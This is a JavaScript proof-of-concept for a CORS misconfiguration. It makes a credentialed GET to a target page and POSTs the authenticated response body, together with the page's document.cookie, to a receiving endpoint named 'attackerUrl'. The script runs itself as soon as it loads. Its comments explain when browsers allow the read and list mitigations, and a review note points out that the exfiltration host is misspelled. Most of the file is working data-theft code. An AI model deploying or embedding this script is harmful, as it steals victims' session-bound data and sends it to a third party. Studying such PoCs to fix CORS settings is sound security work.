// URL that the credentialed cross-origin GET is sent to. A script can read the
// response only if this server's CORS response headers allow the requesting origin
// together with credentials. `crossdomain.xml` is the Flash/Silverlight policy file
// and is not consulted by fetch().
const targetUrl = 'http://example.pro/index.php';
// Endpoint that the captured response body is POSTed to.
// NOTE(review): this host is spelled `exmaple.pro`, unlike the host in targetUrl; confirm which is intended.
const attackerUrl = 'http://exmaple.pro/receive_cookies';
/**
 * Proof of concept for a CORS misconfiguration: reads `targetUrl` with the
 * visitor's cookies attached and POSTs the response body to `attackerUrl`.
 *
 * What this demonstrates, for whoever is assessing or fixing the target:
 * - `document.cookie` holds the cookies of the page running this script, not
 *   those of the target origin, and never includes HttpOnly cookies. The
 *   sensitive value that leaves the browser is the authenticated response body.
 * - The body is readable only when the target answers with
 *   `Access-Control-Allow-Credentials: true` and an `Access-Control-Allow-Origin`
 *   that names the requesting origin. Browsers refuse a credentialed read when
 *   that header is `*`.
 * - Mitigation on the target: match `Origin` against a fixed allowlist instead
 *   of echoing it back, send the credentials header only where it is needed,
 *   and set `SameSite` on session cookies.
 *
 * Returns nothing; both requests are fire-and-forget and failures are only logged.
 */
function exploitCORSAndSendCookies() {
  const credentialedGet = { method: 'GET', credentials: 'include' };

  // Second leg: package the page's own cookie string with the fetched body and post it.
  const relay = (data) => {
    const payload = JSON.stringify({ cookies: document.cookie, data: data });
    fetch(attackerUrl, {
      method: 'POST',
      body: payload,
      headers: { 'Content-Type': 'application/json' },
    })
      .then(() => console.log('Cookies sent to attacker’s server'))
      .catch((err) => console.error('Error sending cookies:', err));
  };

  // First leg: credentialed read of the target; the body is taken as text.
  fetch(targetUrl, credentialedGet)
    .then((res) => res.text())
    .then((data) => {
      console.log('Data received:', data);
      relay(data);
    })
    .catch((err) => console.error('Error fetching data:', err));
}
// Invoked once, as soon as the script is evaluated. The function has no return
// value, so nothing here waits for either request to finish.
exploitCORSAndSendCookies();